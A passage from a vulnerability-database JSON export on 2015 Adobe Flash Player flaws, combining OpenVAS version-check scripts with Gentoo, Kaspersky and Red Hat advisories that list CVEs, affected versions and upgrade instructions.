script_tag(name:\"last_modification\", value:\"$Date: 2018-09-11 16:00:44 +0200 (Tue, 11 Sep 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-04-20 12:39:25 +0530 (Mon, 20 Apr 2015)\");\n script_name(\"Adobe Flash Player Multiple Vulnerabilities - 01 Apr15 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Multiple unspecified use-after-free errors.\n\n - Multiple unspecified double free vulnerabilities.\n\n - An overflow condition that is triggered as user-supplied input is not\n properly validated.\n\n - Improper restriction of discovery of memory addresses.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to cause denial of service, execute arbitrary code, bypass the ASLR\n protection mechanism via unspecified vectors and allow local users to gain\n privileges .\n\n Impact Level: System/Application.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player versions before\n 13.0.0.281 and 14.x through 17.x before 17.0.0.169 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 13.0.0.281 or 17.0.0.169 or later. For updates refer to\n http://get.adobe.com/flashplayer\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-06.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Win/Installed\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"13.0.0.281\"))\n{\n fix = \"13.0.0.281\";\n VULN = TRUE;\n}\n\nif(version_in_range(version:playerVer, test_version:\"14.0\", test_version2:\"17.0.0.168\"))\n{\n fix = \"17.0.0.169\";\n VULN = TRUE;\n}\n\nif(VULN)\n{\n report = 'Installed version: ' + playerVer + '\\n' +\n 'Fixed version: ' + fix + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:51:05", "references": ["2015:0722_1"], "pluginID": "1361412562310851029", "description": "Check the version of Adobe", "edition": 6, "reporter": "Copyright (C) 2015 Greenbone Networks GmbH", "published": "2015-10-16T00:00:00", "title": "SuSE Update for Adobe SUSE-SU-2015:0722-1 (Adobe)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "modified": "2017-12-08T00:00:00", "id": "OPENVAS:1361412562310851029", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851029", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2015_0722_1.nasl 8046 2017-12-08 08:48:56Z santu $\n#\n# SuSE Update for Adobe SUSE-SU-2015:0722-1 (Adobe)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851029\");\n script_version(\"$Revision: 8046 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-08 09:48:56 +0100 (Fri, 08 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2015-10-16 18:00:29 +0200 (Fri, 16 Oct 2015)\");\n script_cve_id(\"CVE-2015-0346\", \"CVE-2015-0347\", \"CVE-2015-0348\", \"CVE-2015-0349\", \"CVE-2015-0350\", \"CVE-2015-0351\", \"CVE-2015-0352\", \"CVE-2015-0353\", \"CVE-2015-0354\", \"CVE-2015-0355\", \"CVE-2015-0356\", \"CVE-2015-0357\", \"CVE-2015-0358\", \"CVE-2015-0359\", \"CVE-2015-0360\", \"CVE-2015-3038\", \"CVE-2015-3039\", \"CVE-2015-3040\", \"CVE-2015-3041\", \"CVE-2015-3042\", \"CVE-2015-3043\", \"CVE-2015-3044\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SuSE Update for Adobe SUSE-SU-2015:0722-1 (Adobe)\");\n script_tag(name: \"summary\", value: \"Check the version of Adobe\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help of detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"\n Adobe Flash Player was updated to 11.2.202.457 to fix several security\n issues that could lead to remote code execution.\n\n An exploit for CVE-2015-3043 was reported to exist in the wild.\n\n The following vulnerabilities were fixed:\n\n * Memory corruption vulnerabilities that could lead to code execution\n (CVE-2015-0347, CVE-2015-0350, CVE-2015-0352, CVE-2015-0353,\n CVE-2015-0354, CVE-2015-0355, CVE-2015-0360, CVE-2015-3038,\n CVE-2015-3041, CVE-2015-3042, CVE-2015-3043).\n * Type confusion vulnerability that could lead to code execution\n (CVE-2015-0356).\n * Buffer overflow vulnerability that could lead to code execution\n (CVE-2015-0348).\n * Use-after-free vulnerabilities that could lead to code execution\n (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358, CVE-2015-3039).\n * Double-free vulnerabilities that could lead to code execution\n (CVE-2015-0346, CVE-2015-0359).\n * Memory leak vulnerabilities that could be used to bypass ASLR\n (CVE-2015-0357, CVE-2015-3040).\n * Security bypass vulnerability that could lead to information disclosure\n (CVE-2015-3044).\");\n script_tag(name: \"affected\", value: \"Adobe on SUSE Linux Enterprise Desktop 12\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_xref(name: \"SUSE-SU\", value: \"2015:0722_1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"SLED12.0SP0\")\n{\n\n if ((res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.457~80.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.457~80.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:00", "references": [], "description": "Buffer overflows, memory corruptions, integer overflows, race conditions, restriction bypass.", "edition": 1, "reporter": "ADOBE", "published": "2015-05-13T00:00:00", "title": "Adobe Flash Player multiple security vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:00", "vector": "NONE", "value": 9.3}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Flash Player", "version": "17.0", "operator": "eq"}], "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "modified": "2015-05-13T00:00:00", "id": "SECURITYVULNS:VULN:14490", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14490", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:15", "references": ["http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3088", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3093", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3091", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3085", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3079", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3086", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3090", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3080", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3089", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3078", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3082", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3077", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3044", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3084", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3092", "https://bugs.gentoo.org/show_bug.cgi?id=549388", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3083", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3087", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3081"], "affectedPackage": [{"OS": "Gentoo", "OSVersion": "any", "packageVersion": "11.2.202.460", "packageName": "www-plugins/adobe-flash", "packageFilename": "UNKNOWN", "arch": "all", "operator": "lt"}], "description": "### Background\n\nThe Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Adobe Flash Player. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process, cause a Denial of Service condition, obtain sensitive information, or bypass security restrictions. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Adobe Flash Player users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=www-plugins/adobe-flash-11.2.202.460\"", "edition": 1, "reporter": "Gentoo Foundation", "published": "2015-05-31T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "gentoo", "title": "Adobe Flash Player: Multiple vulnerabilities", "bulletinFamily": "unix", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "modified": "2015-05-31T00:00:00", "id": "GLSA-201505-02", "href": "https://security.gentoo.org/glsa/201505-02", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-06T19:46:05", "references": ["http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0349", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0351", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3039", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0355", "https://bugs.gentoo.org/show_bug.cgi?id=546706", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0360", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0357", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0359", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0348", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0352", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0354", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0356", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3040", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3042", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0353", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3038", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0347", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3041", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3043", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3044", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0358", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0346", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0350"], "affectedPackage": [{"OS": "Gentoo", "OSVersion": "any", "packageVersion": "11.2.202.457", "packageName": "www-plugins/adobe-flash", "packageFilename": "UNKNOWN", "arch": "all", "operator": "lt"}], "description": "### Background\n\nThe Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Adobe Flash Player. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process or cause a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Adobe Flash Player users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=www-plugins/adobe-flash-11.2.202.457\"", "edition": 1, "reporter": "Gentoo Foundation", "published": "2015-04-17T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "gentoo", "title": "Adobe Flash Player: Multiple vulnerabilities", "bulletinFamily": "unix", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "modified": "2015-04-17T00:00:00", "id": "GLSA-201504-07", "href": "https://security.gentoo.org/glsa/201504-07", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "kaspersky": [{"lastseen": "2018-09-13T06:47:41", "references": [], "description": "### *CVSS*:\n10.0\n\n### *Detect date*:\n05/12/2015\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Adobe products. Malicious users can exploit these vulnerabilities to write local files, bypass security restrictions, execute arbitrary code or obtain sensitive information.\n\n### *Affected products*:\nAdobe Flash Player versions earlier than 17.0.0.188 for OS X and Windows \nAdobe Flash Player ESR versions earlier than 13.0.0.289 \nAdobe Flash Player versions earlier than 11.2.202.460 for Linux \nAdobe AIR runtime, SDK and Compiler versions earlier than 17.0.0.172\n\n### *Solution*:\nUpdate to the latest version \n[Get Flash Player](<https://get.adobe.com/flashplayer/>) \n[Get AIR](<https://get.adobe.com/air/>)\n\n### *Original advisories*:\n[Adobe bulletin](<https://helpx.adobe.com/security/products/flash-player/apsb15-09.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Adobe Flash Player ActiveX](<https://threats.kaspersky.com/en/product/Adobe-Flash-Player-ActiveX/>)\n\n### *CVE-IDS*:\n[CVE-2015-3044](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3044>) \n[CVE-2015-3089](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3089>) \n[CVE-2015-3088](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3088>) \n[CVE-2015-3084](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3084>) \n[CVE-2015-3086](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3086>) \n[CVE-2015-3091](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3091>) \n[CVE-2015-3078](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3078>) \n[CVE-2015-3079](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3079>) \n[CVE-2015-3080](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3080>) \n[CVE-2015-3081](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3081>) \n[CVE-2015-3092](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3092>) \n[CVE-2015-3090](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3090>) \n[CVE-2015-3087](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3087>) \n[CVE-2015-3077](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3077>) \n[CVE-2015-3085](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3085>) \n[CVE-2015-3083](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3083>) \n[CVE-2015-3082](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3082>) \n[CVE-2015-3093](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3093>)", "edition": 13, "reporter": "Kaspersky Lab", "published": "2015-05-12T00:00:00", "title": "\r KLA10574Multiple vulnerabilities in Adobe Flash Player ", "type": "kaspersky", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "info", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "modified": "2018-09-10T00:00:00", "id": "KLA10574", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10574", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-14T00:47:07", "references": [], "description": "### *CVSS*:\n10.0\n\n### *Detect date*:\n05/12/2015\n\n### *Severity*:\nCritical\n\n### *Description*:\nGoogle Chrome was updated to address vulnerabilities in Flash Player. For details look at KLA10574.\n\n### *Affected products*:\nGoogle Chrome versions earlier than 42.0.2311.152\n\n### *Solution*:\nUpdate to the latest version. File with name old_chrome can be still detected after update. It caused by Google Chrome update policy which does not remove old versions when installing updates. Try to contact vendor for further delete instructions or ignore such kind of alerts at your own risk. \n[Get Google Chrome](<https://www.google.com/chrome/browser/desktop/>)\n\n### *Original advisories*:\n[Google blog record](<http://googlechromereleases.blogspot.ru/2015/05/stable-channel-update.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed:+GoogleChromeReleases+\\(Google+Chrome+Releases\\)>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Google Chrome](<https://threats.kaspersky.com/en/product/Google-Chrome/>)\n\n### *CVE-IDS*:\n[CVE-2015-3044](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3044>) \n[CVE-2015-3089](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3089>) \n[CVE-2015-3088](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3088>) \n[CVE-2015-3084](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3084>) \n[CVE-2015-3086](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3086>) \n[CVE-2015-3091](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3091>) \n[CVE-2015-3078](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3078>) \n[CVE-2015-3079](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3079>) \n[CVE-2015-3080](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3080>) \n[CVE-2015-3081](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3081>) \n[CVE-2015-3092](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3092>) \n[CVE-2015-3090](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3090>) \n[CVE-2015-3087](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3087>) \n[CVE-2015-3077](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3077>) \n[CVE-2015-3085](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3085>) \n[CVE-2015-3083](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3083>) \n[CVE-2015-3082](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3082>) \n[CVE-2015-3093](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3093>)", "edition": 15, "reporter": "Kaspersky Lab", "published": "2015-05-12T00:00:00", "title": "\r KLA10576Flash Player update for Google Chrome ", "type": "kaspersky", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "info", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "modified": "2018-09-10T00:00:00", "id": "KLA10576", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10576", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-13T06:47:00", "references": [], "description": "### *CVSS*:\n10.0\n\n### *Detect date*:\n04/14/2015\n\n### *Severity*:\nCritical\n\n### *Description*:\nMemory corruption, buffer overflow, use-after-free, double free and memory leak vulnerabilities were found in Adobe Flash. By exploiting these vulnerabilities malicious users can bypass security restrictions, execute arbitrary code or obtain sensitive information. These vulnerabilities can be exploited remotely via an unknown vectors.\n\n### *Affected products*:\nAdobe Flash Player versions earlier than 17.0.0.169 \nAdobe Flash Player Extended Support versions earlier than 13.0.0.281 \nAdobe Flash Player for Linux versions earlier than 11.2.202.457\n\n### *Solution*:\nUpdate to the latest version \n[Get Flash Player](<https://get2.adobe.com/flashplayer/>)\n\n### *Original advisories*:\n[Adobe bulletin](<https://helpx.adobe.com/security/products/flash-player/apsb15-06.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Adobe Flash Player ActiveX](<https://threats.kaspersky.com/en/product/Adobe-Flash-Player-ActiveX/>)\n\n### *CVE-IDS*:\n[CVE-2015-0354](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0354>) \n[CVE-2015-0355](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0355>) \n[CVE-2015-0352](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0352>) \n[CVE-2015-0353](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0353>) \n[CVE-2015-0350](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0350>) \n[CVE-2015-0351](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0351>) \n[CVE-2015-0348](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0348>) \n[CVE-2015-0349](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0349>) \n[CVE-2015-0346](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0346>) \n[CVE-2015-0347](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0347>) \n[CVE-2015-0357](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0357>) \n[CVE-2015-0356](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0356>) \n[CVE-2015-0359](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0359>) \n[CVE-2015-0358](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0358>) \n[CVE-2015-0360](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0360>) \n[CVE-2015-3038](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3038>) \n[CVE-2015-3039](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3039>) \n[CVE-2015-3042](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3042>) \n[CVE-2015-3043](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3043>) \n[CVE-2015-3040](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3040>) \n[CVE-2015-3041](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3041>) \n[CVE-2015-3044](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3044>)", "edition": 13, "reporter": "Kaspersky Lab", "published": "2015-04-14T00:00:00", "title": "\r KLA10547Multiple vulnerabilities in Flash Player ", "type": "kaspersky", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "info", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "modified": "2018-09-10T00:00:00", "id": "KLA10547", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10547", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2018-06-07T05:58:49", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "5", "packageVersion": "11.2.202.460-1.el5", "arch": "i386", "packageName": "flash-plugin", "packageFilename": "flash-plugin-11.2.202.460-1.el5.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "11.2.202.460-1.el6_6", "arch": "i686", "packageName": "flash-plugin", "packageFilename": "flash-plugin-11.2.202.460-1.el6_6.i686.rpm", "operator": "lt"}], "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash\nPlayer web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player. These\nvulnerabilities are detailed in the Adobe Security Bulletin APSB15-09\nlisted in the References section.\n\nMultiple flaws were found in the way flash-plugin displayed certain SWF\ncontent. An attacker could use these flaws to create a specially crafted\nSWF file that would cause flash-plugin to crash or, potentially, execute\narbitrary code when the victim loaded a page containing the malicious SWF\ncontent. (CVE-2015-3077, CVE-2015-3078, CVE-2015-3080, CVE-2015-3082,\nCVE-2015-3083, CVE-2015-3084, CVE-2015-3085, CVE-2015-3086, CVE-2015-3087,\nCVE-2015-3088, CVE-2015-3089, CVE-2015-3090, CVE-2015-3093)\n\nA security bypass flaw was found in flash-plugin that could lead to the\ndisclosure of sensitive information. (CVE-2015-3079)\n\nTwo memory information leak flaws were found in flash-plugin that could\nallow an attacker to potentially bypass ASLR (Address Space Layout\nRandomization) protection, and make it easier to exploit other flaws.\n(CVE-2015-3091, CVE-2015-3092)\n\nAll users of Adobe Flash Player should install this updated package, which\nupgrades Flash Player to version 11.2.202.460.\n", "reporter": "RedHat", 